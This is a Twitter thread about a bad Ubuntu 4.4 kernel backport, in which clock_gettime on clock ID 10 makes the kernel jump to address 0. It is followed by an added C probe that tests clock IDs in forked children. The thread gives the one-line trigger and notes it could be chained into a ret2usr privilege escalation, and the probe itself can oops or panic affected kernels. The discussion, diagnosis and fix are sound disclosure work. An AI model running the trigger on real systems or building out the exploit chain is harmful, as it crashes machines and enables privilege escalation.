@vnik5287

Doesn't seem like Ubuntu 4.4 LTS kernels want to pull the upstream patch. Can still RIP <-- 0 with syscall(__NR_clock_gettime, 10, 0) pic.twitter.com/SBceR9K20Y

|
Vitaly Nikolenko
@vnik5287

Nov 6

Combine with the P0 null-page mmap bypass on older kernels / AMD or no-SMEP systems and you've got yourself an easy ret2usr exploit

|
Gustavo A. R. Silva
@embeddedgus

Nov 6

Do you see this in LTS 4.9?

|
Vitaly Nikolenko
@vnik5287

Nov 6

Don't know any Ubuntu LTS versions that use 4.9? Upstream is fixed; it's just Ubuntu being special.

|
Ori Nimron
@orinimron123

Nov 6

Hi,
Any idea why it didn't work for me? pic.twitter.com/glO74DSy5V

|
Vitaly Nikolenko
@vnik5287

Nov 6

Hahah, looks like it got un-"patched" in recent kernels. Your version has the patch applied. Try something more recent... mine was 4.4.0-161 from Aug this year.

|
Kees Cook
@kees_cook

Nov 7

@colinianking This looks like a bad backport in Ubuntu's 4.4. The upstream v4.4 doesn't carry the speculation fix at all. When posix_clocks[] changed from registration to static, the now-redundant .clock_get check was removed. It shouldn't be for v4.4:
kernel.ubuntu.com/git/ubuntu/ubu…

|
Tyler Hicks
@tyhicks

Nov 8

We've now got a fix making its way into our kernels:
lists.ubuntu.com/archives/kerne…
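A probe for the behaviour discussed in this thread, added here as an example; it is not code posted by any of the participants. It issues clock_gettime through the raw syscall (bypassing the vDSO, so the kernel's posix_clocks[] lookup really runs) for every clock ID the kernel's static table can hold plus the first out-of-range one, and runs each call in a forked child. On a fixed kernel the unregistered id 10 and the out-of-range id 16 come back as EINVAL; on a kernel with the bad backport Kees Cook describes, the id 10 entry has no .clock_get, so the call jumps to address 0 (the "RIP <-- 0" in the first tweet) and the child is killed, or the whole machine panics if panic_on_oops is set. Assumptions: Linux with glibc; the names probe_clockid, probe_in_child and PROBE_MAX_CLOCKS are mine (PROBE_MAX_CLOCKS mirrors the kernel's MAX_CLOCKS of 16). Run it only in a throwaway VM.

```c
/* Added example: probe which POSIX clock IDs the running kernel accepts
 * through the raw clock_gettime syscall. Not code from the thread above.
 * On an affected Ubuntu 4.4 kernel the probe for id 10 oopses the kernel,
 * so run this only inside a disposable VM. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Size of the kernel's static posix_clocks[] table (MAX_CLOCKS in
 * include/uapi/linux/time.h); ids at or above it must be rejected.
 * The macro name is this example's own. */
#define PROBE_MAX_CLOCKS 16

/*
 * Ask the kernel for clock `clockid` via the syscall instruction, bypassing
 * the vDSO so the posix_clocks[] lookup really happens in the kernel.
 * Returns 0 on success or -errno. The tweet passes a NULL timespec instead
 * of a buffer; the kernel resolves the clock before it touches the user
 * pointer, so a rejected id gives -EINVAL either way and a NULL .clock_get
 * entry is reached either way.
 */
int probe_clockid(int clockid)
{
    struct timespec ts;
    if (syscall(__NR_clock_gettime, clockid, &ts) == 0)
        return 0;
    return -errno;
}

/*
 * Run the probe in a forked child. On a kernel that still carries a NULL
 * .clock_get entry the call never returns: the kernel jumps to address 0
 * and the oops kills the calling task (or the machine, with panic_on_oops).
 * Keeping the parent alive lets it at least report the first case.
 * Returns 0 and stores the child's -errno result in *result, or -1 if
 * fork failed or the child was killed instead of exiting normally.
 */
int probe_in_child(int clockid, int *result)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(-probe_clockid(clockid));   /* exit code 0 = ok, else errno */

    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    *result = -WEXITSTATUS(status);
    return 0;
}

int main(void)
{
    /* Probe every id the table can hold plus the first out-of-range one. */
    for (int id = 0; id <= PROBE_MAX_CLOCKS; id++) {
        int r;
        if (probe_in_child(id, &r) != 0)
            printf("clockid %2d: child died (kernel oops?)\n", id);
        else if (r == 0)
            printf("clockid %2d: supported\n", id);
        else
            printf("clockid %2d: %s\n", id, strerror(-r));
    }
    return 0;
}
```

A fixed kernel reports id 10 and id 16 as "Invalid argument"; a "child died" line for id 10 is the symptom the thread describes, and on such a machine the run may not get that far if the oops escalates to a panic.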